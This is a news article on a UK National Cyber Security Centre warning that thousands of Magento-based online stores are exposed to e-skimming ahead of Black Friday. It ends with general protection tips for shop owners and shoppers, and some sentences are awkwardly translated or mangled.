The UK’s National Cybersecurity Center today warned businesses with online stores that they risk becoming “cyber traps” for hackers ahead of the Black Friday and Cyber Monday rushes of this. year.
The organization, which is part of the UK government, says it has discovered that thousands of sites are vulnerable to an attack called “e-skimming” – the insertion of malicious code into a website’s payment processing pages to obtain financial information from clients. .
Hackers would target websites by exploiting a vulnerability in a specific e-commerce platform called Magento, which websites use to facilitate payments, as opposed to other best ecommerce software.
NCSC findings: cause for concern in UK and US
The National Cybersecurity Center found 4,151 online stores which had been compromised in late September as sensitive customer financial data was stolen in the process.
The vast majority of these websites have been compromised due to a vulnerability in Magento – a popular e-commerce platform used by thousands of small business websites on both sides of the Atlantic – that allows hackers to do something called “e-skimming”.
Magento is the ecommerce platform of choice for many large US-based companies, such as Nike, Canon, and Burger King. This is also not Magento’s first encounter with hackers – just last year, the FBI warned companies using the platform over a three-year-old plug-in vulnerability that was used to steal buyer credentials.
This week’s news, however, is of particular concern given its proximity to Black Friday and Cyber Monday. Both dates see an influx of UK and US users turning to the web to take advantage of the offers.
“We want small and medium online retailers to know how to prevent their sites from being exploited by opportunistic cybercriminals during peak shopping times. Being a victim of cybercrime could leave you and your customers out of your pocket and damage your reputation. – Sara Lyons, deputy director of economics and society at NCSC.
What is e-skimming?
Electronic skimming is a process in which hackers gain access to the payment area of an online store through some kind of vulnerability. In this case, it is the third-party e-commerce platform used, Magento, rather than specific websites themselves.
This type of fraud is often referred to as “Magecart,” the name of the malware family used to intercept payment information at the point of purchase.
The name Magecart Nor is it a coincidence – the malicious code was originally designed to specifically target companies using Magento, but now the term is more widely used for all such attacks.
What can I do to protect myself from e-skimming?
If you have an online store …
If you are a business owner with an online store (whether or not they use Magento), an important step to take immediately is to make sure that the software for the ecommerce platform you are using is fully up to date. day.
“… low-traffic businesses, some small and medium-sized businesses, are always at risk because some of them may not have the resources to invest so much in their cybersecurity. – Herb Stapleton, section chief, FBI Cyber Division.
In this specific case, that means you have the latest security patches on hand for Black Friday and Cyber Monday. Regardless of the time of year, however, if you are processing a high volume of credit or debit card transactions, it is essential that you have a cybersecurity strategy in place that uses as much funds as you can allocate to it. .
If you are thinking of creating one …
However, it should also be said that some hackers are now using “agnostic” code that can be used on various e-commerce platforms, as well as to directly target websites, widgets, and other items such as vendors. ‘to analyse.
If you are a buyer …
If you are a buyer, on the other hand, the best thing to do is to use a credit card rather than a debit card if you can, given the lesser liability for fraud and the fact that the return money on a debit card is not the fastest process.
If you are paying for something online, check recent reviews of the website you want to buy from and enter only the minimum personal information required for a given purchase. Having a card dedicated to online transactions that is almost empty could also be useful, as could a virtual credit card.
You should only transmit payment information to websites whose URLs begin with HTTPS (although this does not mean that all HTTPS websites are safe, sites without it should be treated with extreme caution).
Finally, if you believe you have been the victim of online fraud, immediately report it to your bank and cancel the affected cards to avoid further fraudulent transactions.